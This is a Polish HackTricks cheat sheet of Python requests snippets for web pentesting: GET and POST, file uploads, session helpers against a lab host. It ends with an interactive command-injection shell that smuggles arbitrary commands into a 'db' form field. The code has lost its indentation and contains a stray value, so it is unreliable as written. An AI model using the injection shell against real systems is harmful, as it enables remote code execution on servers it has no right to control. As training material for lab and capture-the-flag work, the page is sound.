Web Requests

Nauka hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Użyj Trickest, aby łatwo tworzyć i automatyzować przepływy pracy zasilane przez najbardziej zaawansowane narzędzia społecznościowe na świecie. Otrzymaj dostęp już dziś:

Zapytania w Pythonie

import requests

url = "http://example.com:80/some/path.php"
params = {"p1":"value1", "p2":"value2"}
headers = {"User-Agent": "fake User Agent", "Fake header": "True value"}
cookies = {"PHPSESSID": "1234567890abcdef", "FakeCookie123": "456"}
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

#Regular Get requests sending parameters (params)
gr = requests.get(url, params=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True)

code = gr.status_code
ret_headers = gr.headers
body_byte = gr.content
body_text = gr.text
ret_cookies = gr.cookies
is_redirect = gr.is_redirect
is_permanent_redirect = gr.is_permanent_redirect
float_seconds = gr.elapsed.total_seconds() 10.231

#Regular Post requests sending parameters (data)
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

#Json Post requests sending parameters(json)
pr = requests.post(url, json=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

#Post request sending a file(files) and extra values
filedict = {"<FILE_PARAMETER_NAME>" : ("filename.png", open("filename.png", 'rb').read(), "image/png")}
pr = requests.post(url, data={"submit": "submit"}, files=filedict)

#Useful for presenting results in boolean/time based injections
print(f"\rflag: {flag}{char}", end="")
##### Example Functions
target = "http://10.10.10.10:8000"
proxies = {}
s = requests.Session()

def register(username, password):
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
return resp

def login(username, password):
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
return resp

def get_info(name):
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
return guid

def upload(guid, filename, data):
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
return guid

def json_search(guid, search_string):
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
return resp.json()

def get_random_string(guid, path):
return ''.join(random.choice(string.ascii_letters) for i in range(10))

Python cmd do wykorzystania RCE

import requests
import re
from cmd import Cmd

class Terminal(Cmd):
prompt = "Inject => "

def default(self, args):
output = RunCmd(args)
print(output)

def RunCmd(cmd):
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
r = requests.post('http://10.10.10.127/select', data=data)
page = r.text
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
if m:
return m.group(1)
else:
return 1


term = Terminal()
term.cmdloop()

Użyj Trickest, aby łatwo budować i automatyzować przepływy pracy z wykorzystaniem najbardziej zaawansowanych narzędzi społecznościowych na świecie. Otrzymaj dostęp już dziś:

Zacznij od zera i zostań mistrzem hakowania AWS dzięki htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated